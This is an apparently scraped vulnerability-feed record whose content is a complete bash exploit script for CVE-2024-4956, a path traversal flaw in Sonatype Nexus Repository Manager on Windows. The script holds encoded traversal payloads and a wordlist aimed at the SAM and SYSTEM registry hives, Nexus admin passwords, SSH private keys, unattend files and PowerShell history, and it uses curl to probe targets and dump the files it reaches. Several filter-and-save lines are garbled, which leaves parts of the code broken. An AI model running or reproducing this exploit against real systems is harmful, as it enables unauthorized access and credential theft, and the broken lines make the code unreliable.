{"uuid": "a6831b7c-5d64-4555-b1ce-ea14b8adb579", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "seen", "source": "https://gist.github.com/stillbigjosh/345cd67cfb56e7e4f4f7eb9da9c20127", "content": "#!/bin/bash\n# CVE-2024-4956 - Sonatype Nexus Repository Manager Path Traversal\n# Windows-compatible version with embedded wordlists\n\nRED='\\033[0;31m'\nGREEN='\\033[0;32m'\nYELLOW='\\033[1;33m'\nCYAN='\\033[0;36m'\nNC='\\033[0m'\n\n# Traversal payload variations - the key difference for Windows\nTRAVERSALS=(\n \"/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..\"\n \"/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..\"\n # Encoded backslash variations\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..%5C..%5C..%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..%5C..%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..%5C..\"\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%5C..%5C..\"\n # Mixed slash variations\n \"/%2F%2F%2F%2F%2F%2F%2F..%5C..%2F..%5C..%2F..%5C..%2F..\"\n # Fewer leading slashes\n \"/%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..\"\n \"/%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..\"\n)\n\n# Windows file wordlist - forward slashes (curl handles this)\nWIN_FILES=(\n # === PROOF OF VULN ===\n \"Windows/win.ini\"\n \"Windows/System32/drivers/etc/hosts\"\n \"Windows/System32/license.rtf\"\n \"Windows/System32/config/RegBack/SAM\"\n\n # === NEXUS CONFIG - Standard install paths ===\n # Default: C:\\nexus or C:\\Program Files\\nexus\n \"nexus/sonatype-work/nexus3/etc/nexus.properties\"\n \"nexus/sonatype-work/nexus3/admin.password\"\n \"nexus/sonatype-work/nexus3/etc/nexus-default.properties\"\n \"nexus/sonatype-work/nexus3/log/nexus.log\"\n \"nexus/sonatype-work/nexus3/log/request.log\"\n \"nexus/sonatype-work/nexus3/etc/fabric/nexus-store.properties\"\n \"nexus/sonatype-work/nexus3/db/security\"\n \"nexus/sonatype-work/nexus3/keystores/node/keystore.properties\"\n \"nexus/etc/nexus-default.properties\"\n \"nexus/bin/nexus.vmoptions\"\n\n # Program Files variations\n \"Program Files/nexus/sonatype-work/nexus3/etc/nexus.properties\"\n \"Program Files/nexus/sonatype-work/nexus3/admin.password\"\n \"Program Files/nexus/sonatype-work/nexus3/etc/nexus-default.properties\"\n \"Program Files/nexus/sonatype-work/nexus3/log/nexus.log\"\n \"Program Files/nexus/sonatype-work/nexus3/etc/fabric/nexus-store.properties\"\n \"Program Files/nexus/etc/nexus-default.properties\"\n \"Program Files/nexus/bin/nexus.vmoptions\"\n\n # Sonatype under Program Files\n \"Program Files/sonatype/nexus/sonatype-work/nexus3/etc/nexus.properties\"\n \"Program Files/sonatype/nexus/sonatype-work/nexus3/admin.password\"\n \"Program Files/sonatype/sonatype-work/nexus3/etc/nexus.properties\"\n \"Program Files/sonatype/sonatype-work/nexus3/admin.password\"\n\n # Standalone sonatype-work at root\n \"sonatype-work/nexus3/etc/nexus.properties\"\n \"sonatype-work/nexus3/admin.password\"\n \"sonatype-work/nexus3/etc/nexus-default.properties\"\n \"sonatype-work/nexus3/log/nexus.log\"\n \"sonatype-work/nexus3/etc/fabric/nexus-store.properties\"\n \"sonatype-work/nexus3/db/security\"\n\n # nexus3 variations (flattened)\n \"nexus3/etc/nexus.properties\"\n \"nexus3/admin.password\"\n \"nexus3/etc/nexus-default.properties\"\n \"nexus3/log/nexus.log\"\n\n # opt style (sometimes mimicked on Windows)\n \"opt/sonatype/sonatype-work/nexus3/etc/nexus.properties\"\n \"opt/sonatype/sonatype-work/nexus3/admin.password\"\n\n # === SONARQUBE CONFIG ===\n \"sonarqube/conf/sonar.properties\"\n \"sonarqube/conf/wrapper.conf\"\n \"sonarqube/logs/sonar.log\"\n \"sonarqube/logs/web.log\"\n \"sonarqube/logs/ce.log\"\n \"sonarqube/logs/es.log\"\n \"Program Files/sonarqube/conf/sonar.properties\"\n \"Program Files/sonarqube/conf/wrapper.conf\"\n \"Program Files/SonarQube/conf/sonar.properties\"\n \"Program Files/SonarQube/conf/wrapper.conf\"\n \"SonarQube/conf/sonar.properties\"\n \"opt/sonarqube/conf/sonar.properties\"\n\n # === USERS & CREDENTIALS ===\n \"Users/Administrator/.ssh/id_rsa\"\n \"Users/Administrator/.ssh/authorized_keys\"\n \"Users/Administrator/Desktop/flag.txt\"\n \"Users/Administrator/Desktop/root.txt\"\n \"Users/Administrator/.bash_history\"\n \"Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt\"\n \"Users/nexus/.ssh/id_rsa\"\n \"Users/nexus/Desktop/flag.txt\"\n \"Users/sonar/.ssh/id_rsa\"\n \"Users/sonar/Desktop/flag.txt\"\n \"Users/svc_nexus/.ssh/id_rsa\"\n \"Users/svc_sonar/.ssh/id_rsa\"\n\n # All users PS history\n \"Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt\"\n\n # === IIS / WEB CONFIG ===\n \"inetpub/wwwroot/web.config\"\n \"inetpub/wwwroot/appsettings.json\"\n\n # === SYSTEM FILES ===\n \"Windows/debug/NetSetup.LOG\"\n \"Windows/System32/inetsrv/config/applicationHost.config\"\n \"Windows/repair/SAM\"\n \"Windows/repair/SYSTEM\"\n \"Windows/Panther/Unattend.xml\"\n \"Windows/Panther/unattend.xml\"\n \"Windows/Panther/Unattended.xml\"\n \"Windows/Panther/unattend/Unattend.xml\"\n \"Windows/System32/sysprep/Unattend.xml\"\n \"Windows/System32/sysprep/unattend.xml\"\n \"ProgramData/unattend.xml\"\n \"Windows/System32/config/SAM\"\n \"Windows/System32/config/SYSTEM\"\n \"Windows/System32/config/SECURITY\"\n)\n\n# C:\\ prefixed versions (url-encoded C: = C%3A or just C:)\nWIN_FILES_CDRIVE=(\n \"C:/Windows/win.ini\"\n \"C:/Windows/System32/drivers/etc/hosts\"\n \"C:/nexus/sonatype-work/nexus3/etc/nexus.properties\"\n \"C:/nexus/sonatype-work/nexus3/admin.password\"\n \"C:/sonatype-work/nexus3/etc/nexus.properties\"\n \"C:/sonatype-work/nexus3/admin.password\"\n \"C:/Program Files/nexus/sonatype-work/nexus3/etc/nexus.properties\"\n \"C:/Program Files/nexus/sonatype-work/nexus3/admin.password\"\n \"C:/sonarqube/conf/sonar.properties\"\n \"C:/Program Files/sonarqube/conf/sonar.properties\"\n \"C:/Users/Administrator/Desktop/flag.txt\"\n \"C:/Windows/Panther/Unattend.xml\"\n)\n\nexploit_single() {\n local base_url=\"$1\"\n local traversal=\"$2\"\n local filepath=\"$3\"\n local encoded_file=$(echo \"$filepath\" | sed 's/ /%20/g; s/\\//%2F/g')\n local url=\"${base_url}${traversal}%2F${encoded_file}\"\n\n response=$(curl -s -o /dev/null -w \"%{http_code}:%{size_download}\" --path-as-is -k \"$url\" 2>/dev/null)\n local code=\"${response%%:*}\"\n local size=\"${response##*:}\"\n\n if [[ \"$code\" == \"200\" && \"$size\" -gt 0 ]]; then\n content=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n # Filter out empty/default error pages\n if [[ -n \"$content\" && ! \"$content\" =~ \"Nexus Repository Manager\" && ! \"$content\" =~ \" \"lfi_${safe_name}.txt\"\n return 0\n fi\n fi\n return 1\n}\n\nscan_mode() {\n local base_url=\"$1\"\n local found=0\n\n echo -e \"${YELLOW}[*] Phase 1: Finding working traversal depth with win.ini...${NC}\"\n local working_traversal=\"\"\n\n for trav in \"${TRAVERSALS[@]}\"; do\n local url=\"${base_url}${trav}%2FWindows%2Fwin.ini\"\n response=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n if [[ \"$response\" =~ \"[fonts]\" || \"$response\" =~ \"[extensions]\" ]]; then\n echo -e \"${GREEN}[+] VULNERABLE! Working traversal found${NC}\"\n echo -e \"${GREEN} Traversal: ${trav}${NC}\"\n echo -e \"${CYAN}${response}${NC}\"\n working_traversal=\"$trav\"\n break\n fi\n done\n\n # Also try C: prefixed\n if [[ -z \"$working_traversal\" ]]; then\n echo -e \"${YELLOW}[*] Trying C: prefixed paths...${NC}\"\n for trav in \"${TRAVERSALS[@]}\"; do\n local url=\"${base_url}${trav}%2FC%3A%2FWindows%2Fwin.ini\"\n response=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n if [[ \"$response\" =~ \"[fonts]\" || \"$response\" =~ \"[extensions]\" ]]; then\n echo -e \"${GREEN}[+] VULNERABLE with C: prefix!${NC}\"\n echo -e \"${GREEN} Traversal: ${trav} + C:${NC}\"\n working_traversal=\"${trav}__CDRIVE__\"\n break\n fi\n done\n fi\n\n # Also try backslash-encoded paths\n if [[ -z \"$working_traversal\" ]]; then\n echo -e \"${YELLOW}[*] Trying backslash-encoded traversals...${NC}\"\n for trav in \"${TRAVERSALS[@]}\"; do\n local url=\"${base_url}${trav}%5CWindows%5Cwin.ini\"\n response=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n if [[ \"$response\" =~ \"[fonts]\" || \"$response\" =~ \"[extensions]\" ]]; then\n echo -e \"${GREEN}[+] VULNERABLE with backslash encoding!${NC}\"\n working_traversal=\"${trav}__BACKSLASH__\"\n break\n fi\n done\n fi\n\n if [[ -z \"$working_traversal\" ]]; then\n echo -e \"${RED}[-] No working traversal found. Target may not be vulnerable.${NC}\"\n echo -e \"${YELLOW}[*] Trying all combinations brute force anyway...${NC}\"\n # Brute force: try first 3 traversals against high-value targets\n for trav in \"${TRAVERSALS[@]:0:5}\"; do\n for filepath in \"Windows/win.ini\" \"nexus/sonatype-work/nexus3/admin.password\" \\\n \"sonatype-work/nexus3/admin.password\" \"nexus3/admin.password\" \\\n \"sonarqube/conf/sonar.properties\"; do\n exploit_single \"$base_url\" \"$trav\" \"$filepath\" && ((found++))\n # C: prefix\n exploit_single \"$base_url\" \"$trav\" \"C:/${filepath}\" && ((found++))\n done\n done\n echo -e \"${YELLOW}[*] Brute force done. ${found} hits.${NC}\"\n return\n fi\n\n echo \"\"\n echo -e \"${YELLOW}[*] Phase 2: Dumping files with working traversal...${NC}\"\n echo \"\"\n\n if [[ \"$working_traversal\" == *\"__CDRIVE__\"* ]]; then\n local real_trav=\"${working_traversal/__CDRIVE__/}\"\n for filepath in \"${WIN_FILES_CDRIVE[@]}\"; do\n local encoded_file=$(echo \"$filepath\" | sed 's/ /%20/g; s/\\//%2F/g; s/:/%3A/g')\n local url=\"${base_url}${real_trav}%2F${encoded_file}\"\n response=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n local size=${#response}\n if [[ \"$size\" -gt 0 && ! \"$response\" =~ \"Nexus Repository Manager\" && ! \"$response\" =~ \" \"lfi_${safe_name}.txt\"\n ((found++))\n fi\n done\n elif [[ \"$working_traversal\" == *\"__BACKSLASH__\"* ]]; then\n local real_trav=\"${working_traversal/__BACKSLASH__/}\"\n for filepath in \"${WIN_FILES[@]}\"; do\n local encoded_file=$(echo \"$filepath\" | sed 's/ /%20/g; s/\\//%5C/g')\n local url=\"${base_url}${real_trav}%5C${encoded_file}\"\n response=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n local size=${#response}\n if [[ \"$size\" -gt 0 && ! \"$response\" =~ \"Nexus Repository Manager\" && ! \"$response\" =~ \" \"lfi_${safe_name}.txt\"\n ((found++))\n fi\n done\n else\n # Standard forward-slash traversal\n for filepath in \"${WIN_FILES[@]}\"; do\n exploit_single \"$base_url\" \"$working_traversal\" \"$filepath\" && ((found++))\n done\n # Also try C: prefixed\n echo -e \"${YELLOW}[*] Phase 3: Trying C: prefixed paths...${NC}\"\n for filepath in \"${WIN_FILES_CDRIVE[@]}\"; do\n local encoded_file=$(echo \"$filepath\" | sed 's/ /%20/g; s/\\//%2F/g; s/:/%3A/g')\n local url=\"${base_url}${working_traversal}%2F${encoded_file}\"\n response=$(curl -s --path-as-is -k \"$url\" 2>/dev/null)\n local size=${#response}\n if [[ \"$size\" -gt 0 && ! \"$response\" =~ \"Nexus Repository Manager\" && ! \"$response\" =~ \" \"lfi_${safe_name}.txt\"\n ((found++))\n fi\n done\n fi\n\n echo \"\"\n echo -e \"${YELLOW}[*] Scan complete. ${found} files retrieved.${NC}\"\n}\n\nsingle_mode() {\n local base_url=\"$1\"\n local filepath=\"$2\"\n local found=0\n\n echo -e \"${YELLOW}[*] Trying all traversal variations for: ${filepath}${NC}\"\n for trav in \"${TRAVERSALS[@]}\"; do\n exploit_single \"$base_url\" \"$trav\" \"$filepath\" && ((found++))\n done\n\n if [[ \"$found\" -eq 0 ]]; then\n echo -e \"${RED}[-] No hits for ${filepath}${NC}\"\n fi\n}\n\nusage() {\n echo \"CVE-2024-4956 - Nexus Repository Manager LFI (Windows)\"\n echo \"\"\n echo \"Usage:\"\n echo \" $0 -u http://TARGET:PORT # Auto-scan with embedded wordlist\"\n echo \" $0 -u http://TARGET:PORT -f FILE # Single file mode\"\n echo \"\"\n echo \"Examples:\"\n echo \" $0 -u http://172.16.210.21:8081\"\n echo \" $0 -u http://172.16.210.21:8081 -f Windows/win.ini\"\n}\n\nmain() {\n local target_url=\"\"\n local target_file=\"\"\n\n while getopts \"u:f:h\" opt; do\n case $opt in\n u) target_url=\"$OPTARG\" ;;\n f) target_file=\"$OPTARG\" ;;\n h) usage; exit 0 ;;\n *) usage; exit 1 ;;\n esac\n done\n\n if [[ -z \"$target_url\" ]]; then\n usage\n exit 1\n fi\n\n # Strip trailing slash\n target_url=\"${target_url%/}\"\n\n echo -e \"${CYAN}=== CVE-2024-4956 Nexus LFI - Windows Mode ===${NC}\"\n echo -e \"${CYAN}Target: ${target_url}${NC}\"\n echo \"\"\n\n if [[ -n \"$target_file\" ]]; then\n single_mode \"$target_url\" \"$target_file\"\n else\n scan_mode \"$target_url\"\n fi\n}\n\nmain \"$@\"", "creation_timestamp": "2026-06-23T09:55:43.000000Z"}